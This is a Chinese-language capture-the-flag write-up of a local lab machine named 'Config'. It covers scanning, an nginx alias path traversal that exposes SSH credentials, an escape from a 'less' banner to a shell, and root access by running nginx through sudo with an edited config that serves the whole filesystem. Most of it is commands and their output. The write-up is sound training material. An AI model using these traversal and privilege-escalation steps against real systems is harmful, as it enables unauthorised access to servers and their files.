![Config[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_reproduce_cover_592955abc623ee47.gif)
信息收集
cmd
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.1.17 08:00:27:c2:13:f5 PCS Systemtechnik GmbH ┌──(root㉿kali)-[~]└─# IP=192.168.1.17cmd
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 14:04 CSTNmap scan report for 192.168.1.17Host is up (0.00025s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp open http nginx 1.18.0|_http-server-header: nginx/1.18.0|_http-title: ConfigMaster - \xE6\x99\xBA\xE8\x83\xBD\xE8\xBF\x90\xE7\xBB\xB4\xE9\x85\x8D\xE7\xBD\xAE\xE7\xAE\xA1\xE7\x90\x86\xE5\xB9\xB3\xE5\x8F\xB0MAC Address: 08:00:27:C2:13:F5 (Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.8Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTEHOP RTT ADDRESS1 0.25 ms 192.168.1.17 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds目录扫描
cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.1.17[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Extensions: php,php3,bak,gz,shtml,txt,html,bk,zip,tar[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/index.html (Status: 200) [Size: 21720]/config (Status: 301) [Size: 169] [--> http://192.168.1.17/config/]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================扫出来 config 目录,接着扫 /config
cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.1.17/config[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Extensions: php,html,bk,bak,zip,tar,shtml,php3,txt,gz[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/index.html (Status: 200) [Size: 21720]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================下载下来diff一下
cmd
┌──(root㉿kali)-[~]└─# curl http://$IP/index.html > index.html % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed100 21720 100 21720 0 0 20.1M 0 --:--:-- --:--:-- --:--:-- 20.7M ┌──(root㉿kali)-[~]└─# curl http://$IP/config/index.html > config_index.html % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed100 21720 100 21720 0 0 15.4M 0 --:--:-- --:--:-- --:--:-- 20.7M ┌──(root㉿kali)-[~]└─# diff index.html config_index.html 没区别
参考文章Vulhub-POC/Nginx 配置错误漏洞.md at master · lg996/Vulhub-POC,可能存在路径穿越
cmd
┌──(root㉿kali)-[~]└─# curl http://$IP/config../ <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.18.0</center></body></html>报 403 了,确实存在路径穿越,接着扫目录
cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config../ -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.1.17/config../[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Extensions: php3,txt,html,bk,bak,shtml,zip,tar,gz,php[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/html (Status: 301) [Size: 169] [--> http://192.168.1.17/config../html/]/config.txt (Status: 200) [Size: 41]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished=============================================================== ┌──(root㉿kali)-[~]└─# curl http://$IP/config../config.txtSSH Credentials: mikannse/mikannsebyebye拿到 SSH 的账号密码
text
==================================| !!! WARNING !!! || Unauthorized access prohibited|| This system is monitored |==================================/home/mikannse/banner.txt (END)输入 !bash 拿到 shell
cmd
mikannse@Config:~$ ls -a. .. banner.txt .bash_history .bash_logout .bashrc .lesshst mikannse.conf .profile user.txtmikannse@Config:~$ cat user.txtflag{user-530773d6-5951-11f0-89d9-836ccaf94d6b}提权
列出当前用户允许通过 sudo 执行的命令
cmd
mikannse@Config:~$ sudo -lMatching Defaults entries for mikannse on Config: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User mikannse may run the following commands on Config: (root) NOPASSWD: /usr/sbin/nginx -c /home/mikannse/mikannse.conf发现可以以 root 身份无需密码执行 /usr/sbin/nginx -c /home/mikannse/mikannse.conf,这意味着可以通过创建或修改 /home/mikannse/mikannse.conf 文件利用 Nginx 配置中的功能来提权
cmd
mikannse@Config:~$ cat mikannse.confuser mikannse;worker_processes auto;pid /run/nginx.pid; events { worker_connections 1024;} http { default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 8080; server_name Config; root /tmp; location / { autoindex on; try_files $uri $uri/ =404; } access_log /var/log/nginx/mikannse_access.log; error_log /var/log/nginx/mikannse_error.log; }}修改配置文件,把 user mikannse; 改为 user root; ,把 root /tmp; 改为 root /;
执行 sudo /usr/sbin/nginx -c /home/mikannse/mikannse.conf,然后访问 http://192.168.1.17:8080/root 就可以看到 flag 文件了
cmd
┌──(root㉿kali)-[~]└─# curl http://192.168.1.17:8080/root/root.txtflag{root-bf116e68-5953-11f0-b06c-63e27ce93d04}